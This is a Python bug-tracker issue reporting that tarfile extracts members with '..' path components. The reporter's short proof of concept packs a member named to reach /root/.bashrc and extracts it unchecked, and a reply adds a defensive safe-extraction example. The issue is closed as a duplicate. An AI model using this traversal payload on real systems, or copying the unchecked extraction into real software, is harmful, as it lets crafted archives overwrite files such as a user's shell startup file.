Classification
Title: tarfile missing cross-directory checking
Type: security
Stage: resolved
Components: Library (Lib)
Versions: Python 3.8

Process
Status: closed
Resolution: duplicate
Dependencies:
Superseder: tarfile: Traversal attack vulnerability (issue 21109)
Assigned To:
Nosy List: eric.smith, martin.panter, xiongpanju
Priority: normal
Keywords:

Created on 2021-09-11 07:45 by xiongpanju, last changed 2021-09-20 06:34 by martin.panter. This issue is now closed.

Messages (3)
msg401631 - (view) Author: daji ma (xiongpanju) Date: 2021-09-11 07:45
tarfile is missing cross-directory checking, like ../ or ..\; this could potentially cause cross-directory decompression.
The exploit:
# -*- coding: utf-8 -*-
import tarfile


def extract_tar(file_path, dest_path):
    # Extracts every member as-is: tarfile does not check that the member
    # name, once joined with dest_path, still resolves inside dest_path.
    try:
        with tarfile.open(file_path, 'r') as src_file:
            for info in src_file.getmembers():
                src_file.extract(info.name, dest_path)
        return True
    except (IOError, OSError, tarfile.TarError):
        return False


def make_tar():
    # Stores the local file 'bashrc' (which must exist in the current
    # directory) under a member name containing '..' components.
    tar_file = tarfile.open('x.tar.gz', 'w:gz')
    tar_file.add('bashrc', '/../../../../root/.bashrc')
    tar_file.list(verbose=True)
    tar_file.close()


if __name__ == '__main__':
    make_tar()
    extract_tar('x.tar.gz', 'xx')
msg401643 - (view) Author: Eric V. Smith (eric.smith) * (Python committer) Date: 2021-09-11 17:05
This is documented in the tarfile docs:

Warning

Never extract archives from untrusted sources without prior inspection. It is possible that files are created outside of path, e.g. members that have absolute filenames starting with "/" or filenames with two dots "..".
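The "prior inspection" the documentation asks for, as an added example that is not code from this issue or from CPython: every member's resolved path (and, for links, the link target) is checked against the destination before anything is written, and a constructed archive with a '..' member like the report's is used to show the check firing. The helper names and the sample archive contents are this example's own.

```python
# Added example, not the issue's or CPython's code: reject members that resolve outside dest.
import os
import tarfile
import tempfile

def _inside(base, target):
    # realpath resolves symlinks and '..', so 'a/../../x' and '/../x' are caught
    base, target = os.path.realpath(base), os.path.realpath(target)
    return target == base or target.startswith(base + os.sep)

def safe_extract(tar_path, dest):
    """Validate every member of tar_path, then extract into dest; returns the member names."""
    os.makedirs(dest, exist_ok=True)
    with tarfile.open(tar_path, 'r:*') as tar:
        members = tar.getmembers()
        for m in members:
            target = os.path.join(dest, m.name)
            if os.path.isabs(m.name) or not _inside(dest, target):
                raise ValueError('member escapes destination: %r' % m.name)
            if m.issym() or m.islnk():  # link targets must stay inside dest too
                base = os.path.dirname(target) if m.issym() else dest
                if not _inside(dest, os.path.join(base, m.linkname)):
                    raise ValueError('link escapes destination: %r' % m.name)
        tar.extractall(dest, members=members)  # nothing is written until all pass
    return sorted(m.name for m in members)

def make_archives(workdir):
    """Constructed input: a benign archive and one with a '..' member like the report's."""
    payload = os.path.join(workdir, 'hello.txt')
    with open(payload, 'w') as f:
        f.write('hello\n')
    good, bad = os.path.join(workdir, 'good.tar.gz'), os.path.join(workdir, 'bad.tar.gz')
    with tarfile.open(good, 'w:gz') as t:
        t.add(payload, arcname='data/hello.txt')
    with tarfile.open(bad, 'w:gz') as t:
        t.add(payload, arcname='../escaped.txt')
    return good, bad

def demo():
    """Returns (names extracted from the benign archive, bad one rejected?, escape written?)."""
    with tempfile.TemporaryDirectory() as work:
        out = os.path.join(work, 'out')
        good, bad = make_archives(work)
        extracted = safe_extract(good, out)
        try:
            safe_extract(bad, out)
            rejected = False
        except ValueError:
            rejected = True
        escaped = os.path.exists(os.path.join(work, 'escaped.txt'))
    return extracted, rejected, escaped
```

A name-based check like this does not cover a member written through a symlink extracted earlier in the same archive; on Python 3.12+ (and the 3.8.17/3.9.17/3.10.12/3.11.4 backports) the built-in `extractall(..., filter='data')` handles that case as well and should be preferred where available.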
msg402194 - (view) Author: Martin Panter (martin.panter) * (Python committer) Date: 2021-09-20 06:34
Issue 21109 has been open for a while and is the same as this, if I am not mistaken.
History
Date                 User           Action  Args
2021-09-20 06:34:12  martin.panter  set     status: open -> closed; superseder: tarfile: Traversal attack vulnerability; nosy: + martin.panter; messages: + msg402194; resolution: duplicate; stage: resolved
2021-09-11 17:05:24  eric.smith     set     nosy: + eric.smith; messages: + msg401643
2021-09-11 07:45:41  xiongpanju     create